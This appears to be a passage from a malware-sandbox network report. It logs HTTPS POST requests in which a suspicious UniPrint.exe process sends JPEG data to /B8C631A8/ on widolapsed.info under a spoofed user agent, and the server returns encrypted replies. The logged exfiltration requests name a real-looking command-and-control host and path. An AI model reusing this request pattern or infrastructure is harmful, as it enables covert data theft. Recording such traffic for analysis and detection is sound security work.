                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:27 UTC167OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:27 UTC183OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:27 UTC198OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:27 UTC214OUTData Raw: c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a6 4b 77 7d 00 47 9e d2 d8 46 d2 22 12 97 0c 48 dc c1 73 82 83 3d 7d 69 f2 3f e9 a1 73 af e9 32 fd 14 51 50 58 57 95 fc 58 ff 00 90 cd 97 fd 70 3f ce bd 52 bc af e2 c7 fc 86 6c bf eb 81 fe 75 ad 2d d9 9d 5d 91 c2 8a 70 a6 8a 5a dd 18 b1 d4 52 52 d3 24 28 a2 8a 60 14 b4 94 50 02 d1 49 45 00 2d 14 94 b4 00 51 45 14 08 28 a2 8a 00 29 69 28 a6 02 d1 49 4b 40 0b
                                                                                                      Data Ascii: I(~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7Kw}GF"Hs=}i?s2QPXWXp?Rlu-]pZRR$(`PIE-QE()i(IK@
                                                                                                      2021-09-15 11:45:27 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 33 33 37 37 32 31 38 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1733772180--
                                                                                                      2021-09-15 11:45:27 UTC230INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:27 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=85da168f2b6a531d09ea3d94b29bf46d98da146ecb3a89da44073fedfa538fa0; expires=Thu, 15-Sep-2022 11:45:27 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:27 UTC230INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.34980745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:18 UTC1577OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76640
                                                                                                      Content-Type: multipart/form-data; boundary=--------2353964795
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 33 39 36 34 37 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2353964795Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 98 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:18 UTC1577OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:18 UTC1593OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:18 UTC1609OUTData Raw: 1f f2 f4 b7 fc 32 2a 4a 28 ad 4c 45 a2 92 96 80 0a 28 a2 81 0b 45 25 2d 20 0a 28 a2 81 05 2d 25 2d 20 0a 5a 4a 51 40 85 14 b4 94 b4 84 2d 58 81 ba 0a ad 53 5b fd ea 89 6c 69 49 da 46 be ac 71 e1 a1 ee d5 c4 bf 5a ec f5 9e 3c 34 9f ef 57 16 e7 9a c7 0b f0 3f 53 d4 af f1 af 43 bd 1c 78 76 cb e8 2a 8e 6a eb 71 e1 fb 11 fe c8 fe 55 46 b9 e8 f5 f5 34 c4 3f 79 7a 0b 9a 33 49 49 5b 1c f7 1d 9a 50 d4 d1 45 16 04 c7 e4 d3 b7 1f 5a 60 a5 a9 68 b4 d9 20 63 4e 0c 6a 21 4e cd 4b 45 29 32 50 e7 d6 9c 26 61 d1 8d 42 0d 2d 4b 8a 2d 4d 96 96 e6 41 fc 46 a5 5b c7 1d 70 6a 90 34 ec d4 3a 71 34 55 64 5f 17 9f de 50 69 7c f8 5b ef 46 2a 86 69 43 1a 97 49 16 aa b2 f6 db 47 ea 98 a4 fb 1d a3 74 38 aa a1 8d 38 31 a9 e5 6b 66 52 9c 5e e8 94 e9 91 9f ba f4 c6 d2 db f8 5c 1a 03 9e
                                                                                                      Data Ascii: 2*J(LE(E%- (-%- ZJQ@-XS[liIFqZ<4W?SCxv*jqUF4?yz3II[PEZ`h cNj!NKE)2P&aB-K-MAF[pj4:q4Ud_Pi|[F*iCIGt881kfR^\
                                                                                                      2021-09-15 11:46:18 UTC1625OUTData Raw: ab 48 c9 c5 3c 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13
                                                                                                      Data Ascii: H<Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw
                                                                                                      2021-09-15 11:46:18 UTC1641OUTData Raw: 16 92 96 8a 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ
                                                                                                      2021-09-15 11:46:18 UTC1652OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 33 39 36 34 37 39 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2353964795--
                                                                                                      2021-09-15 11:46:20 UTC1652INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:18 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cccd4b3373be03a41cb894397280793c16c6b5037f01659ae4fbb150b2220f5e; expires=Thu, 15-Sep-2022 11:46:18 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:20 UTC1652INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.34980845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:21 UTC1652OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76644
                                                                                                      Content-Type: multipart/form-data; boundary=--------2524520363
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 32 34 35 32 30 33 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2524520363Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9c d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:21 UTC1669OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:21 UTC1685OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:21 UTC1701OUTData Raw: 7e 94 79 ba 44 7f de 7a 5e df b2 65 2c 33 ea d2 32 71 4f 11 b9 e0 29 3f 85 68 9d 4b 4f 8f fd 5d a9 3f 5a 43 ae 05 ff 00 55 6b 18 fa d1 ed 2a 3d a2 1e c2 9a de 45 45 b4 9d ba 46 7f 2a b7 69 a6 dc 79 a1 8a 1e b5 1b 6b b7 47 ee 84 5f a0 a6 26 ab 78 f2 2e 65 38 27 b0 a9 92 ac d1 a5 35 42 32 5b b2 e7 8c d7 6c 36 a0 fa 57 2f a7 ff 00 c8 46 df fe ba 2d 74 de 31 25 ad ad 09 ea 56 b9 9d 3f fe 42 36 ff 00 f5 d0 7f 3a 58 7f e0 1d 75 bf 8c 7a 16 a2 96 e6 60 d3 4a 14 e3 a5 52 33 69 b1 f5 72 6a b7 89 09 17 ab 83 fc 35 8b d7 bd 61 42 87 34 13 6c 9c 4e 33 92 a3 8a 89 d0 1d 4f 4f 4f b9 11 34 c3 ae 44 bf ea ed c5 61 51 5b ac 2c 3a 9c 8f 1f 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9
                                                                                                      Data Ascii: ~yDz^e,32qO)?hKO]?ZCUk*=EEF*iykG_&x.e8'5B2[l6W/F-t1%V?B6:Xuz`JR3irj5aB4lN3OOO4DaQ[,:WVuKMt2xmMnOU
                                                                                                      2021-09-15 11:46:21 UTC1717OUTData Raw: 28 a0 02 8a 28 a0 05 a2 92 8a 00 5a 5a 6d 2d 02 16 92 8a 28 01 73 45 25 14 00 b4 52 51 40 0b 45 14 50 02 d1 49 4b 4c 41 4b 49 45 30 0a 28 a2 90 05 14 51 40 05 14 51 40 05 2d 25 14 00 b4 52 52 d3 00 a2 8a 28 10 b4 52 51 40 0b 45 25 14 00 b4 52 51 40 0b 45 14 50 01 45 14 53 10 b4 94 51 40 0b 45 14 50 01 45 14 50 01 45 14 50 02 d1 48 29 69 88 29 69 28 cd 00 2d 14 99 a2 80 16 8c d2 51 40 0b 9a 29 29 68 10 51 45 14 00 52 d2 52 d3 00 a5 a4 a2 80 17 bd 14 51 40 05 14 94 b4 c0 5a 29 28 a0 42 d1 49 4b 40 0b 45 25 14 c4 2d 14 51 40 0b 49 46 68 a0 05 a2 8a 28 00 a5 a4 a2 80 16 81 49 4b 4c 42 d1 9a 4a 29 88 5c d1 9a 4a 28 01 d9 a2 9b 4b 45 c2 c2 d1 9a 4c d2 66 8b 85 87 66 8c d3 73 45 17 0b 0f cd 19 a6 d1 9a 77 15 87 66 93 34 da 5c d2 b8 ec 2e 69 73 4d a4 cd 17 0b 0e
                                                                                                      Data Ascii: ((ZZm-(sE%RQ@EPIKLAKIE0(Q@Q@-%RR(RQ@E%RQ@EPESQ@EPEPEPH)i)i(-Q@))hQERRQ@Z)(BIK@E%-Q@IFh(IKLBJ)\J(KELffsEwf4\.isM
                                                                                                      2021-09-15 11:46:21 UTC1727OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 32 34 35 32 30 33 36 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2524520363--
                                                                                                      2021-09-15 11:46:22 UTC1727INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:21 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=0a1359b7bbe6a79ffa13d42f37651f5ad2e4faae1badc096f3d704d7a9b1f5e9; expires=Thu, 15-Sep-2022 11:46:22 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
